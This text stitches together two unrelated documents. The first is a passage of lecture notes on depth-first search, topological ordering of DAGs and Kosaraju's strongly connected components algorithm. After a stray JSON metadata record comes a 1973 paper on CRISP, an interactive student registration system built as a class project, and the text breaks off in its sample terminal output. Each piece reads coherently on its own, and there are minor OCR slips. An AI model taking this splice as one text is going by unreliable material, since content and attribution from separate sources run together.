\) is on the recursion stack and is thus an ancestor of \( v \). So for back arcs, we’ll have \[ \text{pre}(w) < \text{pre}(v) < \text{post}(v) < \text{post}(w). \] Observe that from this discussion that just looking at the pre/post numbers for two vertices \( x \) and \( y \), we can correctly answer the question: **Is \( x \) an ancestor of \( y \) in the DFS tree? Or is \( y \) an ancestor of \( x \)? Or are they unrelated?** **Exercise:** A tree \( T \) rooted at some node \( r \) naturally defines an ancestor-descendent relation on the nodes. Show that you can label each node with labels of size \( O(\log n) \) bits so that you can answer queries of the form “is \( x \) an ancestor of \( y \) in the \( T \), or is \( y \) an ancestor of \( x \), or are they unrelated?” in constant time. (Assume comparing \( O(\log n) \)-bit integers takes constant time.) 3 Topological Ordering for Directed Acyclic Graphs You know what a directed acyclic graph (DAG) is, right? A directed graph that does not have any directed cycles. I.e., no directed path that starts at \( v \) and ends at \( v \), except of course the path of length 0. No “non-trivial” path. Below’s a DAG and its DFS. **Lemma 2** A digraph \( G \) is a DAG if and only if DFS on the graph has no back arcs. **Proof:** One direction is immediate: if there is a back arc (which goes from an descendent to an ancestor), it creates a cycle. On the other hand, if there is a cycle \( C \) in \( G \), consider the earliest node in \( C \) visited by DFS (the one with the lowest \( \text{pre} \) number). Call it \( v \). Since all nodes in \( C \) are reachable from \( v \), they will be visited before time \( \text{post}(v) \), and will be descendents of \( v \). But then \( v \)'s predecessor \( u \) on the cycle would have resulted in the back arc \( uv \). Look back at the classification of arcs into tree/forward, back, and cross. In a DAG there are no back arcs. This means all the arcs \( vw \) in the graph have the property that \( \text{post}(w) < \text{post}(v) \). In words, the head of each arc has a smaller \( \text{post} \) number than the tail. So here’s a way to output a total ordering of the vertices in \( G \), so that all arcs in \( G \) go from left to right: *Run DFS on \( G \).* *Output the vertices in decreasing order of their \text{post} numbering.* For example, the DAG above will result in the following ordering. Exercise: Naively, the above algorithm asks us to sort the post numbers, which would take $O(n \log n)$ time. Show that the algorithm can be implemented in $O(m + n)$ time by slightly altering the DFS procedure. Exercise: Now suppose you forgot to alter the DFS procedure. You ran DFS, got the post numbers, and now you read the second line. You don’t want to spend $O(n \log n)$ time to sort the $n$ post numbers. How can you sort them in $O(n)$ time? Such an ordering on the nodes where all the arcs point in the same direction (say from left to right) is called a topological ordering. We’ve just shown that the graphs for which a topological ordering exists is precisely DAGs. And the exercise shows we can output a topological ordering in $O(m + n)$ time. Exercise: A source in a digraph is a node that has no arcs coming into it. A sink is a node that has no arcs leaving it. Prove that each DAG must have at least one source and at least one sink. Show a digraph (that is not a DAG) that has no sources and no sinks. Exercise: Prove that the following algorithm also outputs a topological ordering: Find a sink $v$ in the current DAG. Recursively output an ordering on $G - v$ (the graph with $v$ deleted). Output $v$ at the end. Exercise: Prove that the following algorithm also outputs a topological ordering: Find a source $v$ in the current DAG. Output $v$. Recursively output an ordering on $G - v$ (the graph with $v$ deleted). Exercise: Can you implement the algorithms outlined in the above exercises in $O(m + n)$ time? 4 Strong Connected Components Call two vertices $v$ and $w$ equivalent, denoted $v \equiv w$ if there exists a path from $v$ to $w$ and one from $w$ to $v$. The relation “$\equiv$” so defined is an equivalence relation because it satisfies the following three properties: 1. Reflexivity: $w \equiv w$. This is because a path of length zero goes from $w$ to $w$ and vice versa. 2. Symmetry: If $v \equiv w$ then $w \equiv v$. This follows immediately from the definition. 3. Transitivity: If $v \equiv w$ and $w \equiv x$ then $v \equiv x$. If there is a path from $v$ to $w$, and one from $w$ to $x$, then there is a path from $v$ to $x$. The same reasoning shows that there is a path from $x$ to $v$. This equivalence relation induces a partitioning of the vertices of the graph into components in which each pair of vertices in a component are equivalent. These are called the strongly connected components or strong components of the graph. It is standard to abbreviate this as SCCs. On the left is an example of a directed graph partitioned into its SCCs. Then if we contract the SCCs into single nodes, we get the graph on the right, which you notice is a DAG with one source and two sinks. This DAG structure is not a fluke, as we show next. Fact 3 Shrinking each SCC of a graph $G$ into a single node gives us a DAG. Proof: (Sketch) If there were a cycle in the shrunk graph containing the nodes corresponding to SCCs $S_1$ and $S_2$ then we could reach from some node in $S_1$ to some node in $S_2$ (and vice versa). And hence we could reach from all nodes in $S_1$ to all nodes in $S_2$ and vice versa. So $S_1$ and $S_2$ should have been in the same SCC to begin with. Our goal is to devise an algorithm which will compute the SCCs of a graph. There is a very close relationship between the strong components of a graph and the depth first spanning forest of the graph. We shall present an algorithm that uses depth first search to find the strong components of the graph. Here’s the idea behind our algorithm (called Kosaraju’s algorithm). There’s this DAG of SCCs of $G$. Suppose we knew a vertex $v$ in the sink SCC. If we run DFS from $v$, we would see exactly the nodes in the sink SCC. We could then delete these nodes. This would leave a smaller graph $G’$ with the same set of SCCs as $G$ (except the one we just deleted). We repeat — find a vertex $v’$ in a sink SCC in $G’$, use DFS to find the entire sink SCC, delete it and keep going. A nice and clean idea. Two things to worry about. (a) How do we find a node in this sink SCC? (b) How to find this in linear time? (c) And then, how to run the entire algorithm in linear time? OK, one thing at a time. 4.1 Finding a Node in the Sink SCC The crucial idea here is the following observation. Lemma 4 In a run of DFS on digraph $G$, the vertex with the highest post number belongs to the source SCC. Here are two different DFS runs on the same graph with the highest post number in the source component. --- 2Kosaraju’s algorithm is due to S. Rao Kosaraju. There’s no paper associated with it, though — it just appears in the classic textbook of Aho, Hopcroft, and Ullman, attributed to him. 3Why? Clearly we’d see at least the nodes in the same SCC as $v$. The worry is that we might see more — nodes which are reachable from $v$ but can’t reach $v$. That is, we might see nodes that lie in a different SCC. This is why we chose $v$ from a sink SCC. There are no other SCCs reachable from $v$’s SCC. So we’ll see exactly the nodes in $v$’s SCC. Oh, that sounds goo ... Wait, what? The source SCC? Didn’t we want the sink SCC? For our scheme the source SCC won’t do at all. The whole point was that starting DFS from a node in a sink SCC will explore exactly that SCC (which we can peel off and repeat). Starting it from a source SCC might explore a lot more. This is actually easy to fix. Look at the inverted digraph \( G^\leftarrow \) which is obtained by just reversing the directions of all arcs in \( G \). A sink SCC in \( G \) is then a source SCC in the inverted graph \( G^\leftarrow \). This trick allows us to find a sink SCC in \( G \). So back to proving Lemma 4. The proof is immediate once you’ve proved the following claim. **Claim 5** If \( C_1 \) and \( C_2 \) are SCCs in \( G \) with an edge from some node in \( C_1 \) to some node in \( C_2 \), then the highest post number in \( C_1 \) is greater than the highest post number in \( C_2 \). **Proof:** Look at the first node in \( C_1 \cup C_2 \) that DFS visits. Say it is node \( v_1 \in C_1 \), then post(\( v_1 \)) will have the highest post number among all these nodes. Else we visit some \( v_2 \in C_2 \) before any of the nodes in \( C_1 \) — then DFS will visit all nodes in \( C_2 \) before it exits \( v_2 \), and none in \( C_1 \) (because none of the nodes in \( C_1 \) are reachable from \( v_2 \)). In this latter case even all the pre numbers of \( C_1 \) will be later than all the post numbers of \( C_2 \). ■ Good, good. So this says that a single DFS suffices to find a node in a source component of \( G \). And the inverted digraph idea tells us that we can use this to find some node in a sink component \( C_s \) of \( G \). You remember the inverted digraph idea, right? We took the inverted digraph \( G^\leftarrow \) and ran DFS on it to get the post numbers on the nodes. For each \( v \in V \), let’s denote post(\( v \)) on this inverted graph by post\( G^\leftarrow (v) \). Look at the vertex in \( G \) with the highest value of post\( G^\leftarrow (v) \), call this \( v_s \). Call the associated sink CSS \( C_s \). Now run DFS(\( v_s \)) — this will get stuck precisely after exploring \( C_s \), and this DFS will just take time proportional to the number of arcs and nodes within the \( C_s \). **4.2 Finishing the Rest in Linear Time Too** OK, so one SCC down, all the rest to go. And what about the rest? Well, the final piece of the puzzle is also simple. Let \( G' \) be the graph obtained by deleting the nodes and arcs of \( C_s \) from the graph \( G \). The vertex with the highest post\( G^\leftarrow (v) \) number among those remaining in \( G' \) will be in a sink CSS of \( G' \). (You see why? It again follows from Claim 5.) We can now peel off this component, and repeat. The time to peel off each SCC is proportional to the number of arcs within the SCC. Adding over all the SCCs, the total time is again \( O(m+n) \). The algorithm is now easily summarized. *Compute the post numbers in the graph \( G^\leftarrow \), call the numbers post\( G^\leftarrow (\cdot) \).* *Initialize \( H \leftarrow G \*) Repeat until $H$ is empty Let $v$ be the vertex in $H$ with the highest $\text{post}_{G^{-}}(\cdot)$ value Run $\text{DFS}(v)$ in $H$ to find the associated sink SCC $C$, and delete it from $H$. Again, the first step is just DFS, and each step of the loop can be charged to the nodes and edges of the component removed from $H$ in that iteration. Short and simple. And it’s all achieved just by using the simple properties of the DFS algorithm and numbering scheme. **Exercise:** Note that when we are running DFS, we have the flexibility of choosing the start node (and also every time DFS stops before it explores the entire graph, choosing the next node to begin DFS at). Use this observation to implement the above algorithm using 2 DFSs.
{"Source-Url": "http://www.cs.cmu.edu/afs/cs.cmu.edu/user/avrim/www/451f13/lectures/lect0919.pdf", "len_cl100k_base": 5173, "olmocr-version": "0.1.50", "pdf-total-pages": 8, "total-fallback-pages": 0, "total-input-tokens": 26461, "total-output-tokens": 5796, "length": "2e12", "weborganizer": {"__label__adult": 0.00045013427734375, "__label__art_design": 0.0005054473876953125, "__label__crime_law": 0.0005345344543457031, "__label__education_jobs": 0.0032806396484375, "__label__entertainment": 0.00015032291412353516, "__label__fashion_beauty": 0.00023448467254638672, "__label__finance_business": 0.0003325939178466797, "__label__food_dining": 0.0006198883056640625, "__label__games": 0.001598358154296875, "__label__hardware": 0.0017938613891601562, "__label__health": 0.0011339187622070312, "__label__history": 0.0006213188171386719, "__label__home_hobbies": 0.00031828880310058594, "__label__industrial": 0.00093841552734375, "__label__literature": 0.0005488395690917969, "__label__politics": 0.0004062652587890625, "__label__religion": 0.0009360313415527344, "__label__science_tech": 0.23681640625, "__label__social_life": 0.0002014636993408203, "__label__software": 0.00824737548828125, "__label__software_dev": 0.73828125, "__label__sports_fitness": 0.0006718635559082031, "__label__transportation": 0.001148223876953125, "__label__travel": 0.0003843307495117187}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 18881, 0.00626]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 18881, 0.54444]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 18881, 0.90929]], "google_gemma-3-12b-it_contains_pii": [[0, 2362, false], [2362, 4421, null], [4421, 6794, null], [6794, 9963, null], [9963, 12758, null], [12758, 15039, null], [15039, 18134, null], [18134, 18881, null]], "google_gemma-3-12b-it_is_public_document": [[0, 2362, true], [2362, 4421, null], [4421, 6794, null], [6794, 9963, null], [9963, 12758, null], [12758, 15039, null], [15039, 18134, null], [18134, 18881, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 18881, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 18881, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 18881, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 18881, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, true], [5000, 18881, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 18881, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 18881, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 18881, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 18881, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 18881, null]], "pdf_page_numbers": [[0, 2362, 1], [2362, 4421, 2], [4421, 6794, 3], [6794, 9963, 4], [9963, 12758, 5], [12758, 15039, 6], [15039, 18134, 7], [18134, 18881, 8]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 18881, 0.0]]}
olmocr_science_pdfs
2024-11-28
2024-11-28
25c15415d90097be9a917f879f8602010b8988f6
A class project in a systems programming course at the University of Michigan sought to produce a system realistic enough to warrant production use, the underlying assumption being that the reality of the project would motivate students and provide them with valuable experience. Eighteen experienced students in the Computerized Registration Involving Student Participation (CRISP) project worked with the Michigan Terminal System to produce an on-line course registration system for students which would interface with those main parts of the current system dealing with room scheduling, transcript production, etc. Interfaces with the current Data Systems Center were ordered, student groups with individual functions were organized, and internal and external specifications stipulated. The student-designed system was successfully demonstrated, resulting in support from the central university administration for further development and eventual implementation of the system. The conclusion was therefore reached that a class project could produce a realistic system, 1) provided that good tools are available, particularly a general-purpose time-sharing system, and 2) that continual guidance on the interface with the system's eventual environment is maintained. (PB) CRISP: An Interactive Student Registration System B.A. Galler, R. Wagman, J. Bravatto, G. Lift, G. Kern, V. Berstis, and E. Munn The University of Michigan, Ann Arbor, Michigan January 24, 1973 Index Terms Interactive, On-Line, Programming, Systems Programming, Student, Administrative System Abstract A class project, even for an advanced class in systems programming, is usually simplified to make it possible to achieve success. A conflicting goal is to produce a realistic enough system to warrant production use, so as to provide the class with sufficient motivation and the right kind of system experience. The problem is compounded when the resulting system is to be a component in an on-going information-processing system and must be compatible with it— with existing documents and procedures, with unstated assumptions about the data and about the current algorithms used to process the data, and with the social and institutional traditions that surround it. This paper reports on one successful class project of this kind. CRISP: An Interactive Student Registration System B. A. Galler, R. Wagman, J. Bravatto, G. Lift, G. Kern, V. Berstis, and E. Munn Introduction In 1971, Arden, Flanigan, and Galler [1] reported on a systems programming class based on a group project in some area of systems. Clearly, with 15-20 students, over a period of a semester, one can undertake a project of some magnitude, but when one considers the need for specifying the system to be produced, and the programming and debugging time involved, there is always pressure to simplify the system goals. After all, one of the desired outcomes is the successful completion of the project, after facing up to the many difficulties involved. On the other hand, if the students were to become convinced that the exercise is "purely academic," there is a problem in motivation and dedication. Students are always involved in a number of other activities besides the particular course in which the professor is so involved, and if their morale and dedication is weakened, the system project will be endangered. The difficulty, therefore, is to find a problem that is challenging, educational, and feasible, while at the same time realistic, and with enough promise of generating a production system to motivate the students to put a great deal of time and effort into it. It is also important, of course, to choose very good students with sufficient programming background that they can plunge directly into the problem with a minimum of introductory material, and to provide them with good tools. In this case, the 18 students (primarily graduate students) were all quite good programmers, some with one or more years of experience on campus research projects, and they had available to them the facilities of the Michigan Terminal System (MTS), an excellent, general-purpose time-sharing system [2]. The Problem During the months preceding the course, the university administration had been considering the adoption of an alternative to the current system of assigning students to classes. On a campus in which administrative and academic decision-making is highly decentralized, the system currently in use reflects the historical pattern of growth in which small changes are superimposed on each other in response to demands from many different sources. Changes are difficult to implement, and their consequences difficult to predict. Although the administrative Data Systems Center (DSC) is moving rapidly toward efficient on-line access, this was not yet being considered as a viable alternative for the student registration problem. This, then, was an excellent problem for the class; viz, produce an on-line "reservation system" for students, which would interface with the main part of the current system; e.g., the part concerned with room scheduling, transcript producing, time schedule printing, etc., and which would be capable of handling the volume presented by 35,000 students taking courses in any or all of the Fall, Winter, and Spring-Summer terms, and the Spring and Summer half-terms. Moreover, the current lines of students waiting to register should disappear, and the whole thing should cost relatively little to run! Finally, while the class-generated part of the system would be developed to run under MTS, it would have to be planned so that eventually it could be moved to the DSC computer. The Interfaces One immediate problem was the specification of the interface with the current system. Since neither the professor nor any of the students who could be expected to enroll would be very familiar with the current system at DSC, representatives from DSC were solicited to join the class as observers. They would advise on the current system's organization and insure compatibility at the interface. (One very competent person from DSC subsequently enrolled in the course, proving invaluable for these interface requirements.) One of the authors of this paper joined the class as a "participating observer" (no casual observers were allowed, because of group morale considerations), and provided very welcome and useful insights into the counseling interface that the system would have. One additional interface was underrepresented; e.g., the Office of the Registrar, where many of the policy decisions were being made, and while the difficulties thus introduced have now been largely overcome, it points up a danger in such an undertaking. In particular, in areas where the current system is ambiguous or unclear, assumptions were made during the course which might have been different if the Office of the Registrar had been consulted at the time. Fortunately, the final CRISP* system was *CRISP: Computerized Registration Involving Student Participation flexible enough to accommodate most of the changes they wanted to make. The charge to the class on the first day is included here as Appendix A. The interface to the present system was to be as follows: Tapes would be brought from DSC with the current student information file, the master catalog of courses, and the specific offerings for each term under consideration (up to five at any time). These would be used and maintained by CRISP in MTS, and subsequently, after students were assigned to courses and sections, tapes would be generated for further processing by DSC. The Class The organization of the course was essentially that described in [1]. The class was divided into groups, as suggested in Appendix A, although on the first day, the students proposed combining some of the suggested groups and reassigning some of the responsibilities. As a result, the following groups were formed: Group 1 - Data base initialization programs and batch output program specifications. Group 2 - Interactive program to accept input from terminal operator, check for syntactic validity, and call on group 3 routines to interact with data base. Generation of user's manual. Group 3 - Program to call up student record and appropriate course records and process commands as provided by group 2. Group 5 - Manipulation and maintenance of student and course data bases. Group 7 - Interrupt handling and post-processing cleanup of data bases via batch maintenance program. Group 8 - Project management and coordination. Each student was asked to specify his own choice of group, but he was requested to avoid any group for which he already had experience and expertise. (Here the educational goals of the course certainly conflicted with the production goals.) Then the expected problems of social organization began to appear, in terms of internal group leadership, a request for transfer of a dissident from one group to another group which considered itself large enough already, and communications interfaces between groups. The project management function was the responsibility of one of the groups. They tried several devices to facilitate intergroup communication, such as flow analysis, group progress reports, and written specifications for interfaces, and some of these were quite successful. Others, however, were abandoned as too time-consuming for the benefits. The professor attended all classes (and some extra-class group meetings), and offered advice, but remained largely as a monitor and "friend of the court," as well as a buffer to the rest of the university. In some cases, the students ignored this friendly advice - and learned from it. An example of this was the suggestion that in writing code, each group should use distinctive symbols suggestive of the group designation. They considered this unnecessary, but the subsequent confusion over multiply-defined symbols required a fair amount of extra effort. **Specification** As seen in Appendix A, the system needed not only internal specification, but external specification as well.* Because of the need for compatibility with the current system, and credibility --- *Some minor features mentioned in Appendix A were eliminated by the class.* with those familiar with current procedures, it was quickly decided that terminal operators using CRISP would extract the information they needed for input from existing documents. But the interactive responses to the input, error diagnostics, and confirmation of results, as well as the necessary on-line file maintenance commands and interaction, had to be specified. Our "participating observer" offered to produce a user's manual, which would represent the external specifications, and this offer was enthusiastically accepted by all. The class wisely counselled the group concerned with the interactive part of CRISP to organize that area into tabular constructs to facilitate changes. In fact, this was subsequently proven to be very wise, in the ability to add and modify many commands and access authorization codes relatively easily. It was largely in this area that it proved possible to accommodate the wishes of the Office of the Registrar after the course was over. Implementation One lesson the group learned was that the rather enjoyable period of arguing over specifications (both external and internal), must come to an end eventually, and hard decisions must replace wishful generalizations. Data structures must be determined, good estimates of expected volume of transactions must be obtained, and subroutine parameters must be agreed upon; and then a very tight rein must be kept on any further revisions. In this case, the specification phase probably lasted two or three weeks too long. It was clear to everyone that this was happening, but the feeling persisted that the specifications were not yet tight enough; that they had not really faced up to some of the real-world constraints that CRISP would have to live with. As time ran out, some design compromises were finally made, and coding began. It became apparent that not very much time remained for coding and debugging, so a practice was initiated of having each group report its progress to the class at each meeting, in terms of percentage of expected code already written, and percentage thought to be debugged (admittedly difficult to determine!). This near pressure for not delaying the group project was very effective, but integration of the various components produced by the several groups (and only partially debugged in many cases) did not start until the last week of the term. Here the debugging and other on-line facilities of MTS proved invaluable. During the last week of the course, the system was debugged enough to allow a demonstration two weeks later before a number of representatives of the administration. (Of course, only those parts of CRISP which could be relied upon were invoked during the on-line presentation, but the kind of typical activity shown in Appendix B was possible even then.) The debugging sessions were held at a terminal near the batch facility of the Computing Center, so large listings and other printouts could be generated very easily. One feature of the MTS system which turned out to be particularly useful (besides the interactive symbolic debugging system and the system on-line editor), was the ability to suspend activity on one "logical telephone line" and request access to the MTS system via another "logical line," using the same physical line. On this second line one could sign on to MTS under another identification number* and modify or permit files to be accessed by the original task. This kind of flexibility is very useful when integrating many components developed in files belonging to different groups working under various identification numbers. Another development in the MTS system, which was anticipated during the course, but which was not actually available until four months later, was a revision in the MTS file management system to authorize a number of terminals to read and/or write a common set of files. Such a facility is clearly needed for an on-line reservation system, and with the external specifications already available during the course, the students were able to include multiple terminals in the design. Subsequent Developments As a result of the administrative demonstration, a small amount of money and some computer time were authorized to support a subset of the students during the following summer to continue the debugging of CRISP. A committee of representatives of the Office of the Registrar, the Counselling Office of the major undergraduate college, the CRISP class, DSC, the Scheduling Office, and students and faculty from other schools and colleges within the university, began to meet throughout the summer to plan a pilot run of CRISP, using real data. The CRISP group encouraged the use of actual student elections, but advocated a "dry run," so any problems which might develop would not jeopardize the credibility of the system. *More recently, under the same number as well. with the campus community. The pilot run was carried out in Septem- ber, using about 12% of the actual advanced classification student elections for the Fall term. There were a few small prob- lems, but the results were very gratifying. At the time of writing, the committee is currently preparing a recommendation on the use of CRISP for the university. One interesting question which still remains is whether to continue to use CRISP on the MTS system in conjunction with the DSC system, or to convert CRISP to run entirely on the DSC computer. In either case, there is the transitional problem or communicating what is known about CRISP and its internal structures to the staff of DSC for continued maintenance and development. With all of their good intentions, only a few students had the necessary time available for adequate documentation. It is clearly an integral part of system design, but the magnitude of the project forced this aspect to be less than satisfactory. Of course, system docu- mentation was eventually generated, but the lesson was learned by all concerned. Another lesson was involved with the ease with which the CRISP system could be moved entirely to the DSC computer system. Although this had been a goal from the start, and indeed the code had been made modular for this purpose, a number of system dependencies (i.e., implicit assumptions about the use of MTS) did creep in. For example, since each terminal runs an independent CRISP task on an independent copy of MTS (while sharing the actual re-entrant code of MTS), the CRISP system did not itself have to worry about interacting with more than one terminal. This would require very different treatment in the IBM Operating System at DSC. An interesting byproduct of the CRISP work was an interactive room scheduling and reservation system developed by one of the authors for use in the Scheduling Office. When the possibility was raised that the use of CRISP might indicate classes that would overflow assigned rooms, or that additional sections of a popular course would be needed, but academic departments might not be able to obtain new classrooms quickly enough, an interactive on-line reservation system was suggested. After a simple model was developed and implemented by Professor William Riddle with his beginning programming class during the summer, more realistic specifications were written, and the system was implemented and delivered to the Scheduling Office. Conclusions It is indeed possible to take on a realistic system with an advanced class, provided a good set of tools is available; in particular, a flexible general-purpose time-sharing system. Some prospect of eventual adoption of the results, if warranted, can provide a great deal of motivation. On the other hand, care must be taken to have continual guidance on the interface with the eventual environment in which the system will be used. The professor must himself be enthusiastic about the project—student criticisms of the course emphasized this point—but he must be sure to provide a careful balance between student management of the project and his "friendly advice." He must also provide enough initial specification to start the design process, but not so much as to stifle student initiative. The real challenge is to encourage the students in their natural enthusiasm and creativity, tempered with an appropriate sense of the real world. Appendix A: Proposal for CCS 673 Project CRISP* - B. A. Caller 1. General description - The problem is to develop a prototype (hopefully capable of expansion to a full system for the University of Michigan) for the student registration process, excluding payment of fees, etc. The general operation of the system will be as follows: A student will consult a printed Time Schedule as at present, including consultation with his counselor, and taking into account information on closed sections. He will present a completed course election form to one of several terminal operators, who will display any elections already confirmed for that student, and then key in his elections and request space in his selected courses. The system will confirm his elections if possible, and the student will receive written confirmation at a later time. After confirming a student's current elections, the program will request an optional list of preferences for the following term, taken from a list of courses to be offered. Students will be given an opportunity to indicate desired, but not listed, courses as well. Various kinds of queries will be allowed during the process, as well as changes to the Time Schedule information which forms the initial data base for the system. 2. Input - The initial data base will consist of a selected portion (capable of expansion) of the standard Time Schedule, together with coded information as to whether certain combinations must be elected together (such as lecture and lab), and whether certain *Computerized Registration In Spite of Problems courses are cross-listed (so enrollment quotas must be combined), etc. In addition, enrollment quotas and "early warning" levels should be entered, if appropriate. (If possible, enrollment quotas should be maintained by major unit, school or college, by grad/undergrad, by class year, and by concentration. This may be considered a special case of a general need for special restrictions to be invoked for individual courses, except that it would be desirable to be able to get at the quotas dynamically to change them.) Provision should be made for a course to be designated as having a waiting list once any enrollment quota has been reached. (If the quota is later raised, places will be filled first from the waiting list according to order of arrival. Thus, if an instructor wishes to reserve to himself the option of selecting a subset of the people who wish to register for his course, he can specify a quota of zero, but request a waiting list.) 3. **Terminal Operation** - The system should support several kinds of terminals, including a display device (such as the CDC terminal), a teletype or typewriter device, and the touch-tone telephone ARU device. Selective responses should be available which are appropriate to the nature of the device. (Input should normally be echoed, with additional information added for verification purposes, such as course title and/or time at which class meets.) If the requested schedule cannot be confirmed, as many reasons should be given as possible, so as to minimize the number of return trips necessary to obtain an acceptable schedule. (An attempt to register for more than one course at the same hour should be flagged with a warning, but should not be treated as a "fatal error.") If a request for space in a closed course is made, it should be possible to request at the same time (or else be prompted) that the student's name be added to the waiting list. Provision should be made for periodic listing of closed courses for posting, and for interrogation by touch-tone telephone (and spoken response from the ARU) by any student as to the status of any course. The report of the status should give number enrolled and number of available spaces or length of the waiting list. (One might expect a few such telephones to be connected throughout the day for general student use.) Provision should also be made for dropping or adding individual courses by students who have already registered. One program (with restricted access) should be designated the "master program," and this should be (the only one) authorized to change every part of the Time Schedule data, including quotas. Courses or sections may be deleted here, with lists of those already registered for them available. Other programs will be allowed to change quotas for a specific department's courses. Included here is the ability to set or change "early warning" levels, for flagging potentially closed courses. Still other programs, for general use, should be able to query the status of various parts of the data base, such as the number enrolled under any quotas specified, the length of the waiting list, whether a particular section is closed, how many students have enrolled so far, how many today, a particular student's elections already confirmed, etc. 4. **Output** - The system should supply on demand a printed report of the current status of all (or a subset of) course enrollments, a closed-course list (including a separate list of changes - additions and deletions — since the last closed-course list appeared), a list of students enrolled in each course (with an additional list of names on the waiting list), and a schedule for each student showing his confirmed elections. 5. **Data Base Management** — The new file sharing features of MTS should be available in time for this course. Provision will have to be made for back-up and recovery in case of system crashes, as well as temporary lock-out on elections until they are confirmed or rejected (including delays due to prompting for waiting-list action). 6. **Documentation** — In addition to documentation of the internal organization of all components of the system, there should be a User's Guide which would include instructions for preparation of input data, instructions for operating a terminal, instructions to a student as to how to specify his desired elections and query for closed courses or the status of a particular course, and a list of possible diagnostics and the causes for their occurrence. 7. **Suggested Functional groups for class implementation of CRISP** — <table> <thead> <tr> <th>Function</th> <th>Approximate Size of Group</th> </tr> </thead> <tbody> <tr> <td>1. Input Specifications, Initialization of data base, Specification of Storage Structures</td> <td>3</td> </tr> <tr> <td>2. Command Language Specifications and Interpreter</td> <td>3</td> </tr> <tr> <td>3. Terminal support and Query Programs</td> <td>2</td> </tr> <tr> <td>4. Special Course Restriction Routines, System Macros</td> <td>2</td> </tr> <tr> <td>5. Data base management, protection, interlocks</td> <td>3</td> </tr> <tr> <td>6. Generation of output</td> <td>2</td> </tr> </tbody> </table> 7. Restart, recovery, back-up 2 8. Specific Responsibilities of Functional Groups - 8.1 Input Specifications, Initialization of Data Base, etc. - This group will obtain input tape from Administrative Systems, modify it as necessary to include quota information, early warning levels, relationships between lectures and labs, etc., and indications of courses which require special "restriction subroutines." This group is also responsible for specification of the storage structures to be used and for routines for bringing this data into appropriate files. A similar responsibility exists for the list of courses for the following term(s) for preference tabulation. Routines should be provided for updating these tapes as necessary after acquisition from Administrative Systems. 8.2 Command Language Specifications and Interpreter - This group specifies the various commands for interrogating the data base, entering student elections, and modifying the data base. They will provide appropriate prompting routines, and an interpreter which will analyze commands and issue calls on various routines as necessary. (The called routines will be generated by other groups.) 8.3 **Terminal Support and Query Programs** - This group will determine the appropriate forms in which input/output is to occur on the various devices to be used. (Some prompting or display might be appropriate for one type of device and not another.) This group will also implement the routines which search the data base and which modify it. (These routines will call upon primitive routines provided by group 8.5.) 8.4 **Special Course Restriction Routines, System Macros** - This group will generate the special course "restriction subroutines" needed to enforce particular rules. (This is not the checking of prerequisites, which is not intended here.) These subroutines will be invoked during the attempt to confirm a student's elections. This group will also maintain the file of macros developed by the course activity. 8.5 **Data Base Management, Protection, Interlocks** - This group will provide the primitive routines used by the query and modification programs in searching and changing the data base. This group will provide appropriate checks for authorization, interlocking, obtaining and freeing space, etc. 8.6 **Generation of Output** - This group will provide routines for printed reporting of confirmed student elections, class lists, waiting lists, deleted course lists, closed course lists, etc. These routines will be invoked via the Command Language Interpreter. They will also generate a final status tape to return to Administrative Systems for later processing. 8.7 Restart, Recovery, Back-Up - This group will advise the others on appropriate code to be used to facilitate recovery and restart after system failures. Routines will be provided for back-up as necessary. Restart and recovery procedures will be specified and implemented. 8.8 System Integration, Maintenance of System Workbook, Project Coordination, Code Efficiency - This group will assume coordination responsibility, setting goals and monitoring them. Approval of changes to project specifications resides here, as well as monitoring individual groups' documentation and code efficiency. The system workbook will be maintained in one or more files by this group, and they will implement a skeleton system for use during system integration. 8.9 User's Guide, Test Environment, Interaction with Registrar's Office - This group will interact with and represent the user community for this system. They will lobby for whatever improvements are deemed desirable, and they will be aware of the user interface. They will generate a User's Guide suitable to instruct terminal operators and students to interact with the system and to interpret the output to be produced. They will create a test environment for the system. MODIFICATION 1 - Conditional Enrollment Threshold (CET) In the CRISP proposal, provision is made for "early warning" levels, which would initiate messages to departments when enrollment reached preset levels. We now replace the "early warning" concept with the Conditional Enrollment Threshold (CET), which will be set (and dynamically changed) by departments, just as quotas are set and changed. When the enrollment in a section has reached the CET level, requests for enrollment by students will be rejected unless a particular "counselor priority" indication is entered for that course. The operator will enter it only when a signed message is received from a counselor. If the enrollment in a section has in fact reached the section quota, "counselor priority" requests will be queued in the order of arrival at the head of the waiting list, so that such people will be the first admitted to a course if the quota is subsequently raised. The CET is intended to reserve places in sections for those whom counselors are willing to indicate as having special problems and who need special priority. A department may set the CET to zero, requiring special permission for everyone, or they may set the CET equal to the quota for a section (the default case), in which case no counselor priority would be needed for anyone. The response to an interrogation about enrollment in a course should indicate whether the CET has been reached. If there is a waiting list, the length of the CET portion and the length of the non-CET portion would be reported, also. MODIFICATION 2 - Piecewise Registration It is quite possible that registration procedures will be spread over several weeks, and that different groups of students will be registered in different time periods, such as by alphabetical groupings. In this case, it would be desirable to increase the enrollment quotas whenever a new time period began, without necessarily admitting those on the waiting list from the preceding time periods. The program which allows departments to change quotas, therefore, should allow for modification of quotas without the automatic entry into the course of people from the waiting list. Appendix B - CRISP Output YOU ARE NOW CONVERSING WITH CRISP *id 2145273192 214-52-7319-2 WIRE BARBARA 77 L 10:04.10 01-29-73 *ELECTIONS FOR FALL * *el *ELECTIONS FOR FALL * 1 353 C C S 473 3 001 2 353 C C S 673 3 001 TOTAL 